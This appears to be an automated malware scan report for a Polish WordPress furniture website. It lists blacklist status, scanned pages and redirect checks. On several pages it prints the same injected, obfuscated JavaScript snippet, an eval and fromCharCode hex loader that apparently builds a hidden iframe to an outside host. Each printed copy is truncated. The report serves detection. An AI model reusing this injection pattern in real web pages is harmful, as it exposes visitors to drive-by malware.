Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lozka.warszawa.pl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lozka.warszawa.pl/ | 200 OK Content-Length: 21944 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,60,6b,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,60,6b,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,6f,6f,6f,26,59,6a,65,61,6c,67,6a,5d,6b,26,5b,72,27,64,61,68,59,66,71,2 Antivirus reports:
| ||
http://lozka.warszawa.pl/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://lozka.warszawa.pl/wp-content/themes/Arkham/js/effects.js?ver=3.3.2 | 200 OK Content-Length: 291 Content-Type: application/javascript | clean |
http://lozka.warszawa.pl/wp-content/themes/Arkham/js/s3Slider.js?ver=3.3.2 | 200 OK Content-Length: 4224 Content-Type: application/javascript | clean |
http://lozka.warszawa.pl/wp-content/themes/Arkham/js/cufon.js?ver=3.3.2 | 200 OK Content-Length: 18632 Content-Type: application/javascript | clean |
http://lozka.warszawa.pl/wp-content/themes/Arkham/js/Myriad_Pro_700.font.js?ver=3.3.2 | 200 OK Content-Length: 300901 Content-Type: application/javascript | clean |
http://lozka.warszawa.pl/produkty/lozka | 200 OK Content-Length: 17479 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,60,6b,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,60,6b,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,6f,6f,6f,26,59,6a,65,61,6c,67,6a,5d,6b,26,5b,72,27,64,61,68,59,66,71,2 Antivirus reports:
| ||
http://lozka.warszawa.pl/produkty/komody | 200 OK Content-Length: 14812 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,60,6b,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,60,6b,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,6f,6f,6f,26,59,6a,65,61,6c,67,6a,5d,6b,26,5b,72,27,64,61,68,59,66,71,2 Antivirus reports:
| ||
http://lozka.warszawa.pl/kontakt | 200 OK Content-Length: 17750 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,60,6b,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,60,6b,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,6f,6f,6f,26,59,6a,65,61,6c,67,6a,5d,6b,26,5b,72,27,64,61,68,59,66,71,2 Antivirus reports:
| ||
http://lozka.warszawa.pl/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://lozka.warszawa.pl/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js?ver=1.0 | 200 OK Content-Length: 1654 Content-Type: application/javascript | clean |
http://lozka.warszawa.pl/lozka/lozko-space.html | 200 OK Content-Length: 22029 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,60,6b,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,60,6b,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,6f,6f,6f,26,59,6a,65,61,6c,67,6a,5d,6b,26,5b,72,27,64,61,68,59,66,71,2 Antivirus reports:
| ||
http://lozka.warszawa.pl/wp-content/uploads/2011/06/space2.jpg | 200 OK Content-Length: 150896 Content-Type: image/jpeg | clean |
http://lozka.warszawa.pl/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 21 Dec 2014 01:43:48 GMT Pragma: no-cache Location: http://lozka.warszawa.pl Server: Apache/2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 21 Dec 2014 01:43:48 GMT X-Pingback: http://lozka.warszawa.pl/xmlrpc.php | clean |
http://lozka.warszawa.pl/lozko-space.html | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 21 Dec 2014 01:43:49 GMT Pragma: no-cache Location: http://lozka.warszawa.pl Server: Apache/2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 21 Dec 2014 01:43:49 GMT X-Pingback: http://lozka.warszawa.pl/xmlrpc.php | clean |
http://lozka.warszawa.pl/lozka/lozko-space.html?replytocom=2 | 200 OK Content-Length: 22058 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,60,6b,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,60,6b,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,6f,6f,6f,26,59,6a,65,61,6c,67,6a,5d,6b,26,5b,72,27,64,61,68,59,66,71,2 Antivirus reports:
| ||
http://lozka.warszawa.pl/lozka/lozko-space.html?replytocom=4 | 200 OK Content-Length: 22060 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,60,6b,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,60,6b,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,6f,6f,6f,26,59,6a,65,61,6c,67,6a,5d,6b,26,5b,72,27,64,61,68,59,66,71,2 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lozka.warszawa.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 01:43:44 GMT
Server: Apache/2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://lozka.warszawa.pl/xmlrpc.php
GET / HTTP/1.1
Host: lozka.warszawa.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 01:43:44 GMT
Server: Apache/2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://lozka.warszawa.pl/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: lozka.warszawa.pl
Referer: http://www.google.com/search?q=lozka.warszawa.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lozka.warszawa.pl
Referer: http://www.google.com/search?q=lozka.warszawa.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.